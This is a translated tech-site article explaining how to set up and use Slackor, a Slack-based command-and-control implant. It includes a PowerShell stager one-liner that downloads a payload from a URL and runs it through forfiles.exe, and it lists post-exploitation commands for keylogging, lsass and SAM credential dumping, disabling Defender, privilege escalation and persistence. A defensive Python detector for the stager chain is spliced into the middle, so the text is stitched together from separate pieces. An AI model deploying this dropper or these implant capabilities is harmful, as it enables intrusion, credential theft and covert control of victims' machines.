How to use Slack as your command control server

2025-01-17 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 05/31 Report

Many people who are new to this topic are unsure how Slack can be used as a command-and-control (C2) server. This article summarizes how the Slackor tool is set up and used, and I hope it helps you understand the technique.

Slackor

Slackor is a Golang implant that uses Slack as its command-and-control server.

Note: this tool is currently only at the proof-of-concept stage. Before creating any Slack application for it, make sure the application complies with the Slack App developer policy.

Tool installation

The Slackor server is written in Python 3. Before using this tool, you need the following:

1. A Slack workspace

2. A registered Slack App with the following permissions:

channels:read
channels:history
channels:write
files:write:user
files:read

3. Create a BOT

The Slackor project contains the following files:

1. install.sh: installs the dependencies
2. setup.py: creates the Slack channel, the database and the implants
3. agent.py: generates a new implant
4. server.py: the Slackor server, which runs on Linux
5. agent.go: the Golang implant
6. requirements.txt: Python dependencies (installed automatically)

Quick start:

go get github.com/Coalfire-Research/Slackor
cd $GOPATH/src/github.com/Coalfire-Research/Slackor

After running the above commands, run "install.sh" and then "setup.py". The setup script asks you for the "OAuth access token" and the "Bot User OAuth access token" of your Slack application.

After the script completes, the following agent binaries need to exist in the dist/ directory of the project:

agent.windows.exe: Windows 64-bit binary
agent.upx.exe: Windows 64-bit binary, UPX-packed
agent.darwin: macOS 64-bit binary
agent.32.linux: Linux 32-bit binary
agent.64.linux: Linux 64-bit binary

When server.py is running on the Linux host, the tool automatically selects the matching agent binary based on the target host's platform.

The "stager" module generates a one-liner or other dropper:

powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exe

This command uses Invoke-WebRequest (PowerShell v3+) to download the payload and a LOLBin (forfiles.exe) to execute it. When execution completes, the payload deletes itself from disk. This is only a reference sample; you can use other download or execution methods as needed.
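From the defender's side, the stager one-liner above leaves a recognisable process-creation trail: PowerShell downloading to a user-writable path, forfiles.exe proxying execution of a binary outside System32, and that binary appearing as a child of forfiles.exe. The following detector is an added example (not part of Slackor or of the original article) that runs over a handful of constructed, simplified Sysmon-style events; the field names and sample paths are assumptions.

```python
import re

# Constructed process-creation events (simplified Sysmon EventID 1 shape);
# not telemetry from any real host. pid 1-3 mirror the stager chain,
# pid 4-5 are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    {"pid": 1, "ppid": 9, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe iwr http://example.invalid/a -o C:\Users\Public\svc.exe"},
    {"pid": 2, "ppid": 1, "image": r"C:\Windows\System32\forfiles.exe",
     "cmdline": r"forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\svc"},
    {"pid": 3, "ppid": 2, "image": r"C:\Users\Public\svc.exe", "cmdline": r"C:\Users\Public\svc"},
    {"pid": 4, "ppid": 9, "image": r"C:\Windows\System32\forfiles.exe",
     "cmdline": r'forfiles.exe /p C:\logs /m *.log /c "cmd /c del @path"'},
    {"pid": 5, "ppid": 9, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Get-ChildItem C:\Users\Public"},
]

# Download cmdlet/alias followed by an output-file switch.
DOWNLOAD_CMDLET = re.compile(r"\b(iwr|invoke-webrequest|curl|wget)\b.*\s-o(utfile)?\s", re.I)
# Directories a low-privilege user can write to (assumed list, extend as needed).
USER_WRITABLE = re.compile(r"\\users\\public\\|\\appdata\\|\\temp\\|\\programdata\\", re.I)
# The command forfiles.exe runs per matched file.
FORFILES_EXEC = re.compile(r"/c\s+(.+)$", re.I)


def classify(event):
    """Return the names of the rules one event matches (empty list if benign)."""
    hits, cmd, image = [], event["cmdline"], event["image"].lower()
    if image.endswith("powershell.exe") and DOWNLOAD_CMDLET.search(cmd) and USER_WRITABLE.search(cmd):
        hits.append("ps_download_to_user_writable")
    if image.endswith("forfiles.exe"):
        m = FORFILES_EXEC.search(cmd)
        # forfiles with /c pointing at a user-writable path is the proxy-execution pattern;
        # a /c that runs cmd or a System32 tool over real files is normal admin usage.
        if m and USER_WRITABLE.search(m.group(1)):
            hits.append("forfiles_proxy_execution")
    return hits


def scan(events):
    """Return (pid -> matched rules, pids of children spawned by a flagged forfiles.exe)."""
    findings = {e["pid"]: classify(e) for e in events}
    findings = {pid: hits for pid, hits in findings.items() if hits}
    by_pid = {e["pid"]: e for e in events}
    chained = [e["pid"] for e in events
               if "forfiles_proxy_execution" in findings.get(e["ppid"], [])
               and USER_WRITABLE.search(by_pid[e["ppid"]]["cmdline"]) and USER_WRITABLE.search(e["image"])]
    return findings, chained


if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
```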

Tool use

Type "help" or press the TAB key to see all commands supported by the tool; type "help [COMMAND]" to see the description of a single command.

(Slackor: server side)

help - displays the help menu
interact - interacts with an agent
list - lists all registered agents
remove - terminates or removes agents
revive - sends a re-registration signal to all agents
stager - generates a one-liner that downloads and executes the implant
quit - exits the program
wipefiles - deletes all files uploaded to Slack

Once an agent has checked in, we can interact with it. Use "interact [AGENT]" to switch to the command line interface of that agent, then type "help" or press the TAB key to view all commands supported on the agent side.

(Slackor: agent side)

Common commands:

back - returns to the main menu
beacon - changes the agent check-in interval (default is 5 seconds)
download - downloads a file from the agent to the Slackor server
help - displays the help menu
kill - terminates the agent
sleep - puts the agent to sleep
sysinfo - displays the current user, operating system version, system architecture and number of CPU cores
upload - uploads a file from the Slackor server to the agent
wget - fetches any file over HTTP/HTTPS

Windows commands:

bypassuac - spawns a high-integrity agent
cleanup - removes the persistence components
clipboard - retrieves the clipboard contents
defanger - attempts to turn off Windows Defender
duplicate - spawns a copy of the agent
getsystem - spawns an agent with NT AUTHORITY\SYSTEM privileges
keyscan - starts keylogging
minidump - dumps lsass.exe memory and downloads it
persist - creates a persistence implant in an ADS
samdump - attempts to dump the SAM file for offline hash extraction
screenshot - captures a screenshot
shellcode - executes raw x64 shellcode

Linux commands:

screenshot - captures a screenshot

OPSEC

Command output and downloaded files are encrypted with AES, on top of the TLS transport encryption provided by Slack.

When a task requires writing data to disk, the module warns the user. When a shell command is executed, cmd.exe/bash is spawned, which may be monitored on the target host. The following commands are implemented natively by the agent and do not spawn cmd.exe/bash:

cat - prints file contents
cd - changes directory
find - searches for a file name in a directory
getip - gets the external IP address (sends a DNS request)
hostname - displays the host name
ifconfig - displays interface information
ls - lists directory contents
mkdir - creates a directory
pwd - prints the current working directory
rm - removes a file
rmdir - removes a directory
whoami/getuid - prints current user information

Having read the above, have you learned how Slack can be used as a command-and-control server? If you want to learn more, you are welcome to follow the industry information channel. Thank you for reading!
